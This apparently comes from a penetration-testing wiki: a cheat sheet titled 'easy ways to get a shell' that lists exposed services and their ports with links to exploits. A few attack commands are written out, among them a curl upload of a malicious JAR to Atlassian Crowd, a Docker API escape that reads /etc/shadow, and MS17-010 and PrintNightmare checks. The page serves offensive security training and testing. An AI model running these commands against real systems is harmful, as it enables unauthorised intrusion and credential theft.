Low-Hanging Fruit

Easy ways to get a shell

Services

Adobe ColdFusion BlazeDS

Ports: 8080 Exploit:

Adobe ColdFusion BlazeDS Java Object Deserialization RCE

Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code ExecutionExploit Database

Apache Flink

Ports: 5000 Exploit:

Apache Flink JAR Upload Java Code ExecutionRapid7

Apache Flink JobManager TraversalRapid7

Apache Flink 1.9.x - File Upload RCE (Unauthenticated)Exploit Database

Apache Hadoop

Ports: 8088 Exploit:

Hadoop YARN ResourceManager Unauthenticated Command ExecutionRapid7

vulhub/exploit.py at master · vulhub/vulhubGitHub

Apache Solr

Ports: 8983 Exploit:

GitHub - jas502n/solr_rce: Apache Solr RCE via Velocity templateGitHub

GitHub - Imanfeng/Apache-Solr-RCE: Apache Solr Exploits 🌟GitHub

Apache Spark

Ports: 6066 Exploit:

GitHub - ivanitlearning/CVE-2018-11770: Python RCE exploit for Apache Spark rewritten from Metasploit moduleGitHub

Apache Spark Unauthenticated Command ExecutionRapid7

Atlassian Crowd

Ports: 4990 Exploit:

curl -k -H "Content-Type: multipart/mixed" \ --form "file_cdl=@rce.jar" http://[HOST]:4990/crowd/admin/uploadplugin.action

Atlassian Crowd pdkinstall Remote Code Execution ≈ Packet Storm

Cisco Smart Install

Ports: 4786 Exploit:

Cisco Unified Communications Manager

Ports: 6970 Exploit:

curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt

Dameware

Ports: 6129 Exploit:

Dell iDrac

Ports: 443

Exploit:

Dell iDRAC Default LoginRapid7

Docker API

Ports: 2375 Exploit:

docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
Remote Code Execution: chroot /mnt

GlassFish

Ports: 4848 Exploit:

Path Traversal in Oracle GlassFish Server Open Source EditionRapid7

Hashicorp Consul

Ports: 8500 Exploit:

Hashicorp Consul Remote Command Execution via Services APIRapid7

HP Data Protector

Ports: 5555, 5556 Exploit:

HP Data Protector EXEC_INTEGUTIL Remote Code ExecutionRapid7

HP Data Protector 8.10 Remote Command ExecutionRapid7

HP iLO

Ports: 80, 443

Exploit:

CVE-2017-12542/exploit_1.py at master · skelsec/CVE-2017-12542GitHub

IBM Websphere

Ports: 8880 Exploit:

IBM WebSphere RCE Java Deserialization VulnerabilityRapid7

IPMI

Ports: 623 Exploit:

IPMI Information DiscoveryRapid7

IPMI 2.0 RAKP Remote SHA1 Password Hash RetrievalRapid7

IPMI 2.0 Cipher Zero Authentication Bypass ScannerRapid7

Java RMI

Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999 Exploit:

Java RMI Server Insecure Default Configuration Java Code ExecutionRapid7

Java RMI for pentesters: structure, recon and communication (non-JMX Registries).Medium

Java RMI for pentesters part two — reconnaissance & attack against non-JMX registriesMedium

JBoss

Ports: 4444, 4445, 11111 Exploit:

JBoss Vulnerability ScannerRapid7

GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation ToolGitHub

JDWP

Ports: 5005 - 5009, 45000, 45001 Exploit:

JMX

Ports: 8686, 9012, 50500 Exploit:

MS17-010: Eternal Blue

Ports 139, 445

Exploit:

nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip

Portainer

Ports: 9000 Exploit:

PrintNightmare

crackmapexec smb $host_file -u $username -p $password -M spooler

Redis

Ports: 6379 Exploit:

Redis Replication Code ExecutionRapid7

Redis Unauthenticated Code ExecutionRapid7

SAP

Ports: 3300 Exploit:

WebLogic

Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503 Exploit:

Zoho Manageengine Desktop

Ports: 8383 Exploit:

https://srcincite.io/pocs/src-2020-0011.py.txt

References

GitHub - trustedsec/spoonmapGitHub

PreviousTimestomping NextNetworks

Last updated 1 year ago